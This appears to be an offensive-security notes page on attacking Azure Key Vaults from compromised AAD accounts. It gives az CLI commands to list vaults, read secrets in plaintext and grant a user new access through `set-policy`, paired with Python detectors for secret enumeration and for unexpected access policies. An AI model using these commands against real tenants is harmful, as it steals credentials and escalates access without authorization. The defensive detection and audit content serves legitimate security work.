Attacking Key Vaults
While owning users and devices in AAD environments, it's good practice to look out for permissions like
Microsoft.KeyVault/vaults/read # read keys in a vault
Microsoft.KeyVault/vaults/secrets/read # read the plaintext passwords in a vault
Microsoft.KeyVault/vaults/accessPolicies/write # change access policies of vaults
To list the key vaults we have access to, we use:
PS /home/otter> az keyvault list
If we have the right permissions we can also list the keys and secrets stored in the vaults:
- keys are usually stored at
https://<keyvault_name>.vault.azure.net/keys/<key_name>
# list keys
PS /home/otter> az keyvault key list --vault-name <vault_name>
# show key details (only the public portion is returned; the private key material never leaves the vault)
PS /home/otter> az keyvault key show --vault-name <vault_name> -n <key_name>
- secrets are usually stored at
https://<keyvault_name>.vault.azure.net/secrets/<secret_name>
# list secrets
PS /home/otter> az keyvault secret list --vault-name <vault_name>
# show plaintext secrets
PS /home/otter> az keyvault secret show --vault-name <vault_name> -n <secret_name> --query value -o tsv
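The secret reads above show up in the vault's diagnostic logs (the AuditEvent category) as SecretList and SecretGet operations, which is what a defender has to hunt in. The following is an added example, not code from the original page: it runs over a handful of constructed AuditEvent records (a simplified subset of the real schema, namely operationName, identity.claim.upn, callerIpAddress and properties.id) and flags any caller that listed the vault and then fetched several distinct secrets, the enumeration pattern the commands above produce. The threshold and the sample records are assumptions.

```python
"""Flag list-then-dump secret enumeration in Key Vault AuditEvent records.

Added example (not part of the original page). The records below are
constructed and use a simplified subset of the Key Vault diagnostic-log
schema: operationName, identity.claim.upn, callerIpAddress, properties.id.
"""
from collections import defaultdict


def _rec(op, upn, ip, secret_id):
    """Build one constructed AuditEvent-style record."""
    return {
        "operationName": op,
        "identity": {"claim": {"upn": upn}},
        "callerIpAddress": ip,
        "properties": {"id": secret_id},
    }


VAULT = "https://kv-prod.vault.azure.net"  # constructed vault URL

# Constructed sample: a workload reads its one secret (benign); a second
# caller lists the vault and then pulls three different secrets.
SAMPLE_RECORDS = [
    _rec("SecretGet", "app-svc@minions.onmicrosoft.com", "10.0.0.4", f"{VAULT}/secrets/db-conn/abc123"),
    _rec("SecretList", "otter@minions.onmicrosoft.com", "203.0.113.9", f"{VAULT}/secrets"),
    _rec("SecretGet", "otter@minions.onmicrosoft.com", "203.0.113.9", f"{VAULT}/secrets/db-conn/abc123"),
    _rec("SecretGet", "otter@minions.onmicrosoft.com", "203.0.113.9", f"{VAULT}/secrets/api-key/def456"),
    _rec("SecretGet", "otter@minions.onmicrosoft.com", "203.0.113.9", f"{VAULT}/secrets/sa-password/0123ab"),
    _rec("VaultGet", "otter@minions.onmicrosoft.com", "203.0.113.9", VAULT),  # ignored: not a secret op
]


def secret_name(secret_id):
    """Strip vault URL and version from a secret id, e.g. '.../secrets/db-conn/abc123' -> 'db-conn'."""
    return secret_id.rstrip("/").split("/secrets/")[-1].split("/")[0]


def find_secret_enumeration(records, threshold=3):
    """Return callers that issued SecretList and then read >= threshold distinct secrets.

    A single SecretGet by a workload for its own secret is normal; a list
    followed by reads of many different secrets is the dump pattern.
    """
    per_caller = defaultdict(lambda: {"listed": False, "secrets": set(), "ips": set()})
    for r in records:
        op = r.get("operationName")
        if op not in ("SecretList", "SecretGet"):
            continue
        upn = r.get("identity", {}).get("claim", {}).get("upn", "<unknown>")
        entry = per_caller[upn]
        entry["ips"].add(r.get("callerIpAddress", ""))
        if op == "SecretList":
            entry["listed"] = True
        else:
            entry["secrets"].add(secret_name(r["properties"]["id"]))

    findings = []
    for upn, e in per_caller.items():
        if e["listed"] and len(e["secrets"]) >= threshold:
            findings.append({
                "upn": upn,
                "distinct_secrets": len(e["secrets"]),
                "ips": sorted(e["ips"]),
            })
    return sorted(findings, key=lambda f: f["upn"])


if __name__ == "__main__":
    for f in find_secret_enumeration(SAMPLE_RECORDS):
        print(f"{f['upn']} listed the vault and read {f['distinct_secrets']} secrets from {f['ips']}")
```

In a real deployment the records come from the Log Analytics workspace the vault's diagnostic setting writes to; the grouping key can be widened from upn to the caller's object id so service principals are covered too.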
If we compromised a user that can change the access policy for a vault, we can delegate permissions to other users:
PS /home/otter> az keyvault set-policy -n <vault_name> --key-permissions get list --upn otter@minions.onmicrosoft.com
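The delegation above lands in the vault's properties.accessPolicies array, which is exactly what a defender should diff against an allowlist of expected principals. The following is an added example, not code from the original page: it takes JSON in the shape that `az keyvault show -n <vault_name>` returns (the sample here is constructed and the object IDs and allowlist are invented) and reports every policy entry that belongs to an unlisted principal or carries the `all` wildcard, together with the `az keyvault delete-policy` command that removes it.

```python
"""Audit Key Vault access policies against an allowlist of principals.

Added example (not part of the original page). Input mirrors the
properties.accessPolicies array of `az keyvault show`; the vault, object
IDs and allowlist below are constructed.
"""
import json

# Hypothetical allowlist: objectId -> description of the expected principal.
EXPECTED_PRINCIPALS = {
    "11111111-1111-1111-1111-111111111111": "app-svc (workload identity)",
}

# Constructed `az keyvault show` output. Entry 2 is an unexpected user that
# was granted keys get/list (the set-policy command above); entry 3 has the
# 'all' wildcard on every scope.
SAMPLE_VAULT_JSON = json.dumps({
    "name": "kv-prod",
    "properties": {
        "accessPolicies": [
            {"objectId": "11111111-1111-1111-1111-111111111111",
             "permissions": {"keys": ["get"], "secrets": ["get"], "certificates": []}},
            {"objectId": "22222222-2222-2222-2222-222222222222",
             "permissions": {"keys": ["get", "list"], "secrets": [], "certificates": []}},
            {"objectId": "33333333-3333-3333-3333-333333333333",
             "permissions": {"keys": ["all"], "secrets": ["all"], "certificates": ["all"]}},
        ]
    },
})

# Permissions that expose or move key/secret material, beyond mere metadata.
SENSITIVE = {"get", "list", "all", "backup", "restore", "purge", "decrypt", "unwrapkey", "import"}


def _flatten(permissions):
    """Yield 'scope:perm' strings in lower case, e.g. 'secrets:get'."""
    for scope, perms in (permissions or {}).items():
        for perm in perms or []:
            yield f"{scope}:{perm.lower()}"


def audit_access_policies(vault_json, allowlist):
    """Return one finding per policy entry that is unexpected or uses the 'all' wildcard."""
    vault = json.loads(vault_json)
    name = vault["name"]
    findings = []
    for policy in vault["properties"].get("accessPolicies", []):
        oid = policy["objectId"]
        granted = sorted(_flatten(policy.get("permissions")))
        wildcard = [g for g in granted if g.endswith(":all")]
        if oid in allowlist and not wildcard:
            continue  # known principal with scoped permissions: fine
        reason = "principal not in allowlist" if oid not in allowlist else "wildcard 'all' permission"
        findings.append({
            "vault": name,
            "objectId": oid,
            "reason": reason,
            "sensitive": [g for g in granted if g.split(":", 1)[1] in SENSITIVE],
            # Removal command; `az keyvault delete-policy` accepts --object-id (or --upn).
            "remediation": f"az keyvault delete-policy -n {name} --object-id {oid}",
        })
    return findings


if __name__ == "__main__":
    for f in audit_access_policies(SAMPLE_VAULT_JSON, EXPECTED_PRINCIPALS):
        print(f"[{f['vault']}] {f['objectId']}: {f['reason']} ({', '.join(f['sensitive'])})")
        print(f"    fix: {f['remediation']}")
```

Run it against `az keyvault show -n <vault_name> -o json` for each vault returned by `az keyvault list`; the Activity Log entry for the write (Microsoft.KeyVault/vaults/write on the vault resource) gives the timestamp and caller for any finding.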